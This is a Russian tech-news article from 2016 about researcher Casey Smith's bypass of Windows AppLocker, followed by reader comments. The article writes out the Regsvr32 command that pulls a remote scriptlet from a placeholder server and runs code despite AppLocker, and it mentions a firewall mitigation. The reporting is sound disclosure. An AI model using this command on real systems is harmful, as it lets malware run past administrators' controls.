• Blue Origin успешно запустила аналог ракеты SpaceX Falcon Heavy (2 фото + видео)

    Принадлежащая основателю Amazon Джеффу Безосу аэрокосмическая компания Blue Origin совершила успешный запуск тяжёлой ракеты-носителя New Glenn. Её разработка велась в течение почти 10 лет. Сейчас это один из главных конкурентов Falcon Heavy от SpaceX Илона Маска.
    Читать дальше
  • Швеция построит хранилище для ядерных отходов, которого хватит на 100 000 лет (2 фото)

    Швеция начала строительство постоянного хранилища для отработанного ядерного топлива, рассчитанного на 100 000 лет. Это второй подобный объект в мире после финского. Хранилище будет расположено в Форсмарке, в 150 километрах к северу от Стокгольма.
    Читать дальше
  • Новый iPhone SE (2025) будет похож на смартфон 15-летней давности (2 фото)

    Инсайдер Сони Диксон (@SonnyDickson) опубликовал в соцсети X фотографии макетов iPhone SE четвёртого поколения. Модель 2025 года будет кардинально отличаться от предшественника и в то же время напоминать один из первых «яблочных» смартфонов.
    Читать дальше
  • OnePlus представила смартфоны OnePlus 13 и OnePlus 13R (15 фото)

    Обе новинки отличаются самыми высокими характеристиками и сочетают в себе модернизированные модели камер, возможности искусственного интеллекта с недавно выпущенной OxygenOS 15, мощные чипы Snapdragon и улучшенную систему охлаждения. С 13 января они доступны по специальной цене.
    Читать дальше
  • Удаление объектов и фона в Microsoft Paint стало доступным всем пользователям Windows 11

    Для продвижения компьютеров класса Copilot+ PC компания Microsoft выпустила множество интересных функций на базе генеративного искусственного интеллекта, в том числе несколько инструментов для редактирования изображений в Paint. Теперь эти новые инструменты работают не только на машинах с маркировкой Copilot+PC, оснащённых процессорами Sn...
    Читать дальше

Безопасность Windows оказалась под угрозой

27 апреля 2016 | Просмотров: 12 163 | Windows
Безопасность Windows оказалась под угрозой

В течение многих лет в бизнес-ориентированных версиях Windows присутствует функция AppLocker, которая позволяет администратору регулировать запуск тех или иных программ на компьютере. Например, можно запретить установку любых программ или запуск уже имеющихся приложений, которые не относятся к работе сотрудника. Это несомненно полезно для компаний, стремящихся защитить свою структуру от потенциально опасного ПО, однако исследователь Кейси Смит (Casey Smith) выяснил, что полностью доверять AppLocker не стоит, поскольку обнаруженная им уязвимость позволяет обходить ограничения администратора с помощью одной строки кода. Таким образом хакерам ничего не стоит взломать компьютеры и запустить вредоносное ПО.

Кейси Смит указал на инструмент Regsvr32, который можно использовать не по назначению для скачивания из интернета определенного XML-файла. Ввод команды вида regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll и скачивание файла, приведет к запуску cmd.exe, который можно заменить на любую другую программу, несмотря на установленные администратором ограничения в AppLocker. Атака не оставляет следов на жестком диске и в реестре, а в арсенале Microsoft пока не существует соответствующей «заплатки» для этой уязвимости. Описание ее Смит опубликовал на сервисе GitHub. Как вариант защиты рекомендуется отрезать Regsvr32 от интернета с помощью файервола.

Источник: engadget.com


Комментарии: 5

  1. Hilo
    27 апреля 2016 10:17 Hilo
    Есть повод разработчикам заняться работой
    + 2
    Ответить
  2. Гость_Xumepa
    27 апреля 2016 10:58 Гость_Xumepa
    С админом можно и договориться об установке необходимого ПО
    + 0
    Ответить
  3. Гость_M
    27 апреля 2016 11:30 Гость_M
    В россии, за рубежом зарплата сисадминрстраторов достаточно высокая дабы не договорились
    + 0
    Ответить
  4. WadymOS
    27 апреля 2016 12:08 WadymOS
    Это что ж за админ такой, с которым можно договориться?
    + 0
    Ответить
  5. zlodeu
    28 апреля 2016 11:41 zlodeu
    Я например! )))
    + 3
    Ответить
В Вашем браузере отключен JavaScript. Для корректной работы сайта настоятельно рекомендуется его включить.